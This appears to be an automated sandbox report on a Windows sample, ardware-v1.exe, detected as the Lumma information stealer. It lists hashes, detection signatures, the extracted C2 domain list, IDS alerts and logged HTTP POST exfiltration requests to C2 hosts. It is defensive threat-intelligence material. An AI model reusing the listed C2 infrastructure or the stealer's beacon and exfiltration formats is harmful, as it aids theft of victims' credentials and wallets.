
Windows Analysis Report
ardware-v1.exe

Overview

General Information

Sample name: ardware-v1.exe
Analysis ID: 1577233
MD5: c491ddba2ee7516cfc5d5b57ece509a2
SHA1: c0d068660dd74e890bf653a5c839e32314f6bca3
SHA256: 1a0b974102462f42d51ae78898fa59bcb9e399c9c3207d26ce0a503a1262f1e6
Tags: exe, user-smica83

Detection

LummaC
Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Performs DNS queries to domains with low reputation
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Detected potential crypto function
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directories for files)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • ardware-v1.exe (PID: 1972 cmdline: "C:\Users\user\Desktop\ardware-v1.exe" MD5: C491DDBA2EE7516CFC5D5B57ECE509A2)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Blogpost URLs:
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["immureprech.biz", "debonairnukk.xyz", "diffuculttan.xyz", "deafeninggeh.biz", "effecterectz.xyz", "wrathful-jammy.cyou", "awake-weaves.cyou", "spend-shiny.cyou", "sordid-snaked.cyou"], "Build id": "tfL8re--"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |

Source | Rule | Description | Author | Strings
00000000.00000003.3121711204.0000000000B05000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000000.00000003.3120968564.0000000000B03000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000000.00000003.3121039700.0000000000A85000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000000.00000003.3121763569.0000000000A85000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: ardware-v1.exe PID: 1972 | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-18T09:52:27.405887+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49858 | 45.77.249.79 | 443 | TCP
2024-12-18T09:52:31.002104+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49869 | 104.131.68.180 | 443 | TCP
2024-12-18T09:52:34.686184+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49879 | 23.55.153.106 | 443 | TCP
2024-12-18T09:52:37.376405+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49886 | 172.67.157.254 | 443 | TCP
2024-12-18T09:52:39.453862+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49892 | 172.67.157.254 | 443 | TCP
2024-12-18T09:52:42.080645+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49899 | 172.67.157.254 | 443 | TCP
2024-12-18T09:52:44.116781+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49905 | 172.67.157.254 | 443 | TCP
2024-12-18T09:52:48.083642+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49915 | 172.67.157.254 | 443 | TCP
2024-12-18T09:52:51.363600+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49922 | 172.67.157.254 | 443 | TCP
2024-12-18T09:52:54.488685+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49932 | 172.67.157.254 | 443 | TCP
2024-12-18T09:52:59.111699+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49943 | 172.67.157.254 | 443 | TCP
2024-12-18T09:52:28.314598+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.5 | 49858 | 45.77.249.79 | 443 | TCP
2024-12-18T09:52:31.418623+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.5 | 49869 | 104.131.68.180 | 443 | TCP
2024-12-18T09:52:38.082760+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.5 | 49886 | 172.67.157.254 | 443 | TCP
2024-12-18T09:52:40.496208+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.5 | 49892 | 172.67.157.254 | 443 | TCP
2024-12-18T09:52:59.855849+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.5 | 49943 | 172.67.157.254 | 443 | TCP
2024-12-18T09:52:28.314598+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.5 | 49858 | 45.77.249.79 | 443 | TCP
2024-12-18T09:52:31.418623+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.5 | 49869 | 104.131.68.180 | 443 | TCP
2024-12-18T09:52:38.082760+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.5 | 49886 | 172.67.157.254 | 443 | TCP
2024-12-18T09:52:40.496208+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.5 | 49892 | 172.67.157.254 | 443 | TCP
2024-12-18T09:52:31.002104+0100 | 2058215 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 49869 | 104.131.68.180 | 443 | TCP
2024-12-18T09:52:27.405887+0100 | 2058223 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 49858 | 45.77.249.79 | 443 | TCP
2024-12-18T09:52:32.607672+0100 | 2058210 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 55031 | 1.1.1.1 | 53 | UDP
2024-12-18T09:52:28.318715+0100 | 2058214 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 61377 | 1.1.1.1 | 53 | UDP
2024-12-18T09:52:29.304741+0100 | 2058214 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 61377 | 1.1.1.1 | 53 | UDP
2024-12-18T09:52:31.982468+0100 | 2058216 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 51044 | 1.1.1.1 | 53 | UDP
2024-12-18T09:52:31.751951+0100 | 2058218 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 49924 | 1.1.1.1 | 53 | UDP
2024-12-18T09:52:31.439534+0100 | 2058220 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 54285 | 1.1.1.1 | 53 | UDP
2024-12-18T09:52:24.101138+0100 | 2058222 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 51514 | 1.1.1.1 | 53 | UDP
2024-12-18T09:52:25.103064+0100 | 2058222 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 51514 | 1.1.1.1 | 53 | UDP
2024-12-18T09:52:32.832362+0100 | 2058226 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 61235 | 1.1.1.1 | 53 | UDP
2024-12-18T09:52:32.204519+0100 | 2058236 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 56842 | 1.1.1.1 | 53 | UDP
2024-12-18T09:52:42.809344+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49899 | 172.67.157.254 | 443 | TCP
2024-12-18T09:52:27.407240+0100 | 2822521 | 1 | Domain Observed Used for C2 Detected | 45.77.249.79 | 443 | 192.168.2.5 | 49858 | TCP
2024-12-18T09:52:31.004078+0100 | 2822521 | 1 | Domain Observed Used for C2 Detected | 104.131.68.180 | 443 | 192.168.2.5 | 49869 | TCP
2024-12-18T09:52:54.496050+0100 | 2843864 | 1 | A Network Trojan was detected | 192.168.2.5 | 49932 | 172.67.157.254 | 443 | TCP
2024-12-18T09:52:35.623619+0100 | 2858666 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 49879 | 23.55.153.106 | 443 | TCP

AV Detection

Source: https://awake-weaves.cyou/apii | Avira URL Cloud: Label: malware
Source: https://deafeninggeh.biz/PK | Avira URL Cloud: Label: malware
Source: https://wrathful-jammy.cyou/DI; | Avira URL Cloud: Label: malware
Source: spend-shiny.cyou | Avira URL Cloud: Label: malware
Source: https://sordid-snaked.cyou/s | Avira URL Cloud: Label: malware
Source: 00000000.00000002.3219952030.00000000008E0000.00000002.00001000.00020000.00000000.sdmp | Malware Configuration Extractor: LummaC {"C2 url": ["immureprech.biz", "debonairnukk.xyz", "diffuculttan.xyz", "deafeninggeh.biz", "effecterectz.xyz", "wrathful-jammy.cyou", "awake-weaves.cyou", "spend-shiny.cyou", "sordid-snaked.cyou"], "Build id": "tfL8re--"}
Source: ardware-v1.exe | Virustotal: Detection: 15%
Source: ardware-v1.exe | ReversingLabs: Detection: 23%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 80.8% probability
Source: 00000000.00000002.3219952030.00000000008E0000.00000002.00001000.00020000.00000000.sdmp | String decryptor: sordid-snaked.cyou
Source: 00000000.00000002.3219952030.00000000008E0000.00000002.00001000.00020000.00000000.sdmp | String decryptor: awake-weaves.cyou
Source: 00000000.00000002.3219952030.00000000008E0000.00000002.00001000.00020000.00000000.sdmp | String decryptor: wrathful-jammy.cyou
Source: 00000000.00000002.3219952030.00000000008E0000.00000002.00001000.00020000.00000000.sdmp | String decryptor: debonairnukk.xyz
Source: 00000000.00000002.3219952030.00000000008E0000.00000002.00001000.00020000.00000000.sdmp | String decryptor: diffuculttan.xyz
Source: 00000000.00000002.3219952030.00000000008E0000.00000002.00001000.00020000.00000000.sdmp | String decryptor: effecterectz.xyz
Source: 00000000.00000002.3219952030.00000000008E0000.00000002.00001000.00020000.00000000.sdmp | String decryptor: deafeninggeh.biz
Source: 00000000.00000002.3219952030.00000000008E0000.00000002.00001000.00020000.00000000.sdmp | String decryptor: immureprech.biz
Source: 00000000.00000002.3219952030.00000000008E0000.00000002.00001000.00020000.00000000.sdmp | String decryptor: spend-shiny.cyou
Source: 00000000.00000002.3219952030.00000000008E0000.00000002.00001000.00020000.00000000.sdmp | String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.3219952030.00000000008E0000.00000002.00001000.00020000.00000000.sdmp | String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.3219952030.00000000008E0000.00000002.00001000.00020000.00000000.sdmp | String decryptor: - Screen Resoluton:
Source: 00000000.00000002.3219952030.00000000008E0000.00000002.00001000.00020000.00000000.sdmp | String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.3219952030.00000000008E0000.00000002.00001000.00020000.00000000.sdmp | String decryptor: Workgroup: -
Source: 00000000.00000002.3219952030.00000000008E0000.00000002.00001000.00020000.00000000.sdmp | String decryptor: tfL8re--
Source: ardware-v1.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: ardware-v1.exe | Static PE information: certificate valid
Source: unknown | HTTPS traffic detected: 45.77.249.79:443 -> 192.168.2.5:49858 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.131.68.180:443 -> 192.168.2.5:49869 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.5:49879 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49886 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49892 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49899 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49905 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49915 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49922 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49932 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49943 version: TLS 1.2
Source: ardware-v1.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Admin\Workspace\1191982842\Project\Release\Project.pdb | source: ardware-v1.exe
Source: C:\Users\user\Desktop\ardware-v1.exe | Directory queried: number of queries: 1001

Networking

Source: Network traffic | Suricata IDS: 2058222 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (immureprech .biz) : 192.168.2.5:51514 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058214 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (deafeninggeh .biz) : 192.168.2.5:61377 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058210 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (awake-weaves .cyou) : 192.168.2.5:55031 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058236 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wrathful-jammy .cyou) : 192.168.2.5:56842 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058226 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou) : 192.168.2.5:61235 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058220 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (effecterectz .xyz) : 192.168.2.5:54285 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058215 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (deafeninggeh .biz in TLS SNI) : 192.168.2.5:49869 -> 104.131.68.180:443
Source: Network traffic | Suricata IDS: 2058216 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (debonairnukk .xyz) : 192.168.2.5:51044 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2822521 - Severity 1 - ETPRO MALWARE Malicious SSL Certificate Detected (Linux.Rex Scanner) : 104.131.68.180:443 -> 192.168.2.5:49869
Source: Network traffic | Suricata IDS: 2058218 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (diffuculttan .xyz) : 192.168.2.5:49924 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058223 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (immureprech .biz in TLS SNI) : 192.168.2.5:49858 -> 45.77.249.79:443
Source: Network traffic | Suricata IDS: 2822521 - Severity 1 - ETPRO MALWARE Malicious SSL Certificate Detected (Linux.Rex Scanner) : 45.77.249.79:443 -> 192.168.2.5:49858
Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49858 -> 45.77.249.79:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49858 -> 45.77.249.79:443
Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49869 -> 104.131.68.180:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49869 -> 104.131.68.180:443
Source: Network traffic | Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.5:49879 -> 23.55.153.106:443
Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49886 -> 172.67.157.254:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49886 -> 172.67.157.254:443
Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49892 -> 172.67.157.254:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49892 -> 172.67.157.254:443
Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49899 -> 172.67.157.254:443
Source: Network traffic | Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.5:49932 -> 172.67.157.254:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49943 -> 172.67.157.254:443
Source: Malware configuration extractor | URLs: immureprech.biz
Source: Malware configuration extractor | URLs: debonairnukk.xyz
Source: Malware configuration extractor | URLs: diffuculttan.xyz
Source: Malware configuration extractor | URLs: deafeninggeh.biz
Source: Malware configuration extractor | URLs: effecterectz.xyz
Source: Malware configuration extractor | URLs: wrathful-jammy.cyou
Source: Malware configuration extractor | URLs: awake-weaves.cyou
Source: Malware configuration extractor | URLs: spend-shiny.cyou
Source: Malware configuration extractor | URLs: sordid-snaked.cyou
Source: DNS query: effecterectz.xyz
Source: DNS query: diffuculttan.xyz
Source: DNS query: debonairnukk.xyz
Source: Joe Sandbox View | IP Address: 45.77.249.79
Source: Joe Sandbox View | IP Address: 23.55.153.106
Source: Joe Sandbox View | IP Address: 104.131.68.180
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49869 -> 104.131.68.180:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49886 -> 172.67.157.254:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49915 -> 172.67.157.254:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49922 -> 172.67.157.254:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49879 -> 23.55.153.106:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49892 -> 172.67.157.254:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49943 -> 172.67.157.254:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49899 -> 172.67.157.254:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49932 -> 172.67.157.254:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49858 -> 45.77.249.79:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49905 -> 172.67.157.254:443
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: immureprech.biz
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: deafeninggeh.biz
Source: global traffic | HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Host: steamcommunity.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 42 | Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=3P6WUUG987FHXT | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 12806 | Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=H35EOF1EQDXQI | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 15042 | Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=9LGACG00F8 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 20514 | Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=DPBZA0XI7BIZVZ5YU | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 1232 | Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=BMHH2DI7CB9 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 555019 | Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 77 | Host: lev-tolstoi.com
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Host: steamcommunity.com
Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; | equals www.youtube.com (Youtube)
Source: global traffic | DNS traffic detected: DNS query: spend-shiny.cyou
Source: global traffic | DNS traffic detected: DNS query: immureprech.biz
Source: global traffic | DNS traffic detected: DNS query: deafeninggeh.biz
Source: global traffic | DNS traffic detected: DNS query: effecterectz.xyz
Source: global traffic | DNS traffic detected: DNS query: diffuculttan.xyz
Source: global traffic | DNS traffic detected: DNS query: debonairnukk.xyz
Source: global traffic | DNS traffic detected: DNS query: wrathful-jammy.cyou
Source: global traffic | DNS traffic detected: DNS query: awake-weaves.cyou
Source: global traffic | DNS traffic detected: DNS query: sordid-snaked.cyou
Source: global traffic | DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic | DNS traffic detected: DNS query: lev-tolstoi.com
Source: unknown | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: immureprech.biz
Source: ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://127.0.0.1:27060
Source: ardware-v1.exe, 00000000.00000003.3087715098.00000000035B9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: ardware-v1.exe, 00000000.00000003.3087715098.00000000035B9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: ardware-v1.exe | String found in binary or memory: http://cert.ssl.com/SSL.com-timeStamping-I-RSA-R1.cer0Q
Source: ardware-v1.exe | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
